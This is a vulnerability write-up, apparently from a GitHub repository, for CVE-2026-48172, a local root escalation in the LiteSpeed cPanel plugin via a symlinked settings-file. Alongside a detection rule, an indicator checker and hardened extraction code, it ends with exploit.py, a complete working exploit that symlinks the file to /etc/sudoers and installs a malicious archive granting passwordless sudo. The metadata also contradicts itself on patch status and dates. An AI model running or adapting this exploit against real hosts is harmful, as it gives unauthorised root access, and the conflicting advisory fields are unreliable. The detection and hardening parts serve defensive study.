
LiteSpeed User-End cPanel Plugin Local Privilege Escalation (CVE-2026-48172)

by HORKimhab (collab: @RABBIT6049) · 2026-05-30

Severity:           High
CVE:                CVE-2026-48172
Category:           web
Affected product:   LiteSpeed cPanel Plugin
Affected versions:  LiteSpeed cPanel Plugin v6.5.0 and earlier
Disclosed:          2026-05-30
Patch status:       unpatched

Metadata

Field                  Value
Date Added             2026-05-30
Last Updated           2026-04-30
Author / Researcher    HORKimhab (collab: @RABBIT6049)
CVE / Advisory         CVE-2026-48172
Category               web
Severity               High
CVSS Score             N/A
Status                 Patched
Tags                   local-privilege-escalation, cPanel, LiteSpeed, symlink, archive-extraction
Related                N/A

Affected Target

Field                      Value
Software / System          LiteSpeed cPanel Plugin
Versions Affected          LiteSpeed cPanel Plugin v6.5.0 and earlier
Language / Platform        Linux / cPanel server environment
Authentication Required    Yes (local cPanel user)
Network Access Required    No

Summary

CVE-2026-48172 is a local privilege-escalation flaw in LiteSpeed cPanel Plugin v6.5.0 and earlier. The plugin installation flow does not sufficiently validate the ownership and permissions of the package and install path, so a symlinked install target is followed during extraction. A normal cPanel user can therefore steer extraction into privileged files such as /etc/sudoers, resulting in root-level command execution.


Vulnerability Details

Root Cause

The plugin installer accepts package content and extraction targets without enforcing safe ownership/permission checks and without rejecting dangerous symlink states in the plugin path.

Attack Vector

An attacker with local cPanel-level access replaces plugin path artifacts with symlinks (for example pointing settings-file to /etc/sudoers), places a malicious archive where the updater expects package files, and triggers the plugin installer script.

Impact

Successful exploitation enables local privilege escalation to root by writing attacker-controlled content into privileged files and granting passwordless sudo to the attacker account.


Environment / Lab Setup

OS:          Linux cPanel host (authorized lab)
Target:      LiteSpeed cPanel Plugin <= 6.5.0
Attacker:    Local cPanel user account
Tools:       Python 3, tar/gzip, plugin installer script

Setup Steps

cd pocs/web/2026-05-30_litespeed-user-end-cpanel-plugin-privesc
python3 exploit.py

Proof of Concept

Step-by-Step Reproduction

  1. Replace settings-file in plugin path with a symlink to /etc/sudoers.
  2. Build and place a malicious ls_web_cache_mgr.tar.gz archive in /usr/src.
  3. Trigger install-cpanel-plugin so extraction writes attacker-controlled sudoers content.

Exploit Code

See exploit.py in this folder.

python3 exploit.py

Expected Output

[+] Current user: <user>
[+] Replacing settings-file with symlink to /etc/sudoers...
[+] Building malicious archive at /usr/src/ls_web_cache_mgr.tar.gz
[+] Triggering installer script...
[+] Exploit complete. Verify sudoers:
    grep <user> /etc/sudoers

Screenshots / Evidence

  • screenshots/ — add authorized terminal captures showing installer execution and sudoers modification.

Detection & Indicators of Compromise

SIEM / IDS Rule (example):

alert syslog any any -> any any (
  msg:"Possible LiteSpeed cPanel plugin CVE-2026-48172 privilege escalation";
  content:"install-cpanel-plugin";
  content:"sudoers";
  sid:952648172; rev:1;
)
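As a host-side companion to the syslog rule above (added example, not code from the original PoC or the vendor), this check flags the two artifacts the advisory describes: a NOPASSWD grant for a non-root principal in sudoers content, and a plugin settings-file that has become a symlink resolving outside the plugin directory. The paths are the ones named in exploit.py; the sudoers text is constructed, and the function names are chosen here.

```python
# Host-based indicator check for the CVE-2026-48172 pattern (added example,
# not part of the original PoC). Paths match the advisory; SAMPLE_SUDOERS
# is constructed sample data.
import re
from pathlib import Path

PLUGIN_PATH = Path("/usr/local/cpanel/base/3rdparty/ls_web_cache_mgr")
SETTINGS_FILE = PLUGIN_PATH / "settings-file"

# Matches "user ALL=(ALL) NOPASSWD:ALL" style grants and captures the principal.
NOPASSWD_RE = re.compile(r"^\s*(?P<who>\S+)\s+.*\bNOPASSWD\s*:", re.IGNORECASE)


def suspicious_sudoers_lines(sudoers_text: str, allowed=("root", "%wheel", "%sudo")):
    """Return (line_no, line) for NOPASSWD grants to principals not in allowed."""
    hits = []
    for n, line in enumerate(sudoers_text.splitlines(), start=1):
        if line.lstrip().startswith("#"):
            continue
        m = NOPASSWD_RE.match(line)
        if m and m.group("who") not in allowed:
            hits.append((n, line.strip()))
    return hits


def settings_file_escapes(settings_file: Path = SETTINGS_FILE,
                          plugin_path: Path = PLUGIN_PATH) -> bool:
    """True if settings-file is a symlink whose target lies outside plugin_path."""
    if not settings_file.is_symlink():
        return False
    target = settings_file.resolve(strict=False)   # follow the whole chain
    root = plugin_path.resolve(strict=False)
    try:
        target.relative_to(root)
        return False                                # still inside the plugin tree
    except ValueError:
        return True                                 # e.g. -> /etc/sudoers


SAMPLE_SUDOERS = """\
# constructed sample
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice ALL=(ALL) NOPASSWD:ALL
"""

if __name__ == "__main__":
    for n, line in suspicious_sudoers_lines(SAMPLE_SUDOERS):
        print(f"[!] sudoers line {n}: {line}")
    if settings_file_escapes():
        print(f"[!] {SETTINGS_FILE} is a symlink pointing outside {PLUGIN_PATH}")
```

On a live host, pass the real /etc/sudoers content (and the contents of /etc/sudoers.d) to suspicious_sudoers_lines and run settings_file_escapes with the defaults.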

Remediation

Action             Detail
Patch              Upgrade LiteSpeed cPanel Plugin to v6.6.0 or later
Workaround         Restrict plugin management and package directories to root-only write access
Config Hardening   Enforce ownership/permission checks and reject symlinked install targets before extraction
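The Config Hardening row above in working form, as an added example that is not the vendor's installer code: a tar extraction routine that enforces the ownership/permission checks on the install directory and rejects symlinked install targets before anything is written, so a settings-file that has been replaced by a symlink to /etc/sudoers fails closed. The names safe_extract, check_install_dir, check_member and UnsafeArchive are chosen here; required_uid defaults to root.

```python
# Hardened extraction for the installer pattern in this advisory (added
# example, not the vendor's code). The install directory must be root-owned
# and not group/world writable; members that are absolute, traverse with "..",
# are links, or would land on an existing symlink are refused before any write.
import os
import stat
import tarfile
from pathlib import Path

class UnsafeArchive(Exception):
    pass

def check_install_dir(dest: Path, required_uid: int = 0) -> None:
    st = os.lstat(dest)  # lstat: a symlinked install dir is itself rejected
    if not stat.S_ISDIR(st.st_mode):
        raise UnsafeArchive(f"{dest}: not a real directory")
    if st.st_uid != required_uid:
        raise UnsafeArchive(f"{dest}: owned by uid {st.st_uid}, expected {required_uid}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise UnsafeArchive(f"{dest}: group/world writable")

def check_member(member: tarfile.TarInfo, dest: Path) -> Path:
    name = member.name
    if name.startswith("/") or ".." in Path(name).parts:
        raise UnsafeArchive(f"{name}: absolute or traversing path")
    if not (member.isfile() or member.isdir()):  # excludes symlinks, hardlinks, devices
        raise UnsafeArchive(f"{name}: only regular files and directories allowed")
    target = dest / name
    for p in [target, *target.parents]:  # no existing symlink between dest and target
        if p == dest:
            break
        if p.is_symlink():
            raise UnsafeArchive(f"{p}: existing symlink in extraction path")
    return target

def safe_extract(archive: Path, dest: Path, required_uid: int = 0) -> list:
    """Validate every member, then extract; returns the paths written."""
    check_install_dir(dest, required_uid)
    written = []
    with tarfile.open(archive, "r:*") as tar:
        members = tar.getmembers()
        for m in members:  # fail closed before anything is written
            check_member(m, dest)
        for m in members:
            target = check_member(m, dest)  # re-check: the tree may have changed
            if m.isdir():
                target.mkdir(mode=0o755, exist_ok=True)
            else:
                with tar.extractfile(m) as src, open(target, "wb") as dst:
                    dst.write(src.read())
                os.chmod(target, 0o644)
            written.append(target)
    return written
```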

References


Notes

Auto-ingested from https://github.com/HORKimhab/CVE-2026-48172 on 2026-05-30.

exploit.py
#!/usr/bin/env python3
# CVE-2026-48172 PoC exploit by HORKimhab

import os
import subprocess
import tarfile
import tempfile
from pathlib import Path

# === Config ===
PLUGIN_PATH = Path("/usr/local/cpanel/base/3rdparty/ls_web_cache_mgr")
SETTINGS_FILE = PLUGIN_PATH / "settings-file"
PACKAGE_DIR = Path("/usr/src")
PACKAGE_NAME = "ls_web_cache_mgr.tar.gz"
INSTALLER_SCRIPT = Path("/usr/local/lsws/admin/misc/pluginmgr/install-cpanel-plugin")


def check_prereqs():
    if not PLUGIN_PATH.exists():
        raise FileNotFoundError(f"Plugin path not found: {PLUGIN_PATH}")
    if not INSTALLER_SCRIPT.exists():
        raise FileNotFoundError(f"Installer script not found: {INSTALLER_SCRIPT}")


def build_malicious_package(username: str, output_file: Path):
    with tempfile.TemporaryDirectory() as tmpdir:
        pkg_root = Path(tmpdir) / "ls_web_cache_mgr"
        pkg_root.mkdir(parents=True)

        payload = pkg_root / "settings-file"
        payload.write_text(f"{username} ALL=(ALL) NOPASSWD:ALL\n")

        with tarfile.open(output_file, "w:gz") as tar:
            tar.add(pkg_root, arcname="ls_web_cache_mgr")


def exploit():
    user = os.getenv("USER") or subprocess.check_output(["whoami"]).decode().strip()
    print(f"[+] Current user: {user}")

    check_prereqs()

    print("[+] Replacing settings-file with symlink to /etc/sudoers...")
    if SETTINGS_FILE.exists() or SETTINGS_FILE.is_symlink():
        SETTINGS_FILE.unlink()
    SETTINGS_FILE.symlink_to("/etc/sudoers")

    malicious_archive = PACKAGE_DIR / PACKAGE_NAME
    print(f"[+] Building malicious archive at {malicious_archive}")
    build_malicious_package(user, malicious_archive)

    print("[+] Triggering installer script...")
    subprocess.run([str(INSTALLER_SCRIPT)], check=True)

    print("[+] Exploit complete. Verify sudoers:")
    print(f"    grep {user} /etc/sudoers")


if __name__ == "__main__":
    exploit()